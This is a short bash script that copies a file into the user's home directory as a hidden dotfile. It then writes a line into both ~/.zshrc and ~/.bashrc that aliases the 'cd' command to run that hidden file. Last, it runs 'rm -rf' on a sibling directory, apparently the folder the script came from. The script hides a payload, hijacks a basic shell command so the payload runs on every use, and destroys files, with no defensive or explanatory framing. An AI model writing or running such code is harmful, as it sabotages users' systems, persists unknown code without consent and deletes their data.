#!/bin/bash

cp 07_03_21_in_memory_of_the_Kesha ~/
mv ~/07_03_21_in_memory_of_the_Kesha ~/.07_03_21_in_memory_of_the_Kesha

echo "alias cd=\"~/.07_03_21_in_memory_of_the_Kesha\"" >> ~/.zshrc
echo "alias cd=\"~/.07_03_21_in_memory_of_the_Kesha\"" >> ~/.bashrc
rm -rf ../party_parrot_dancer_floor/
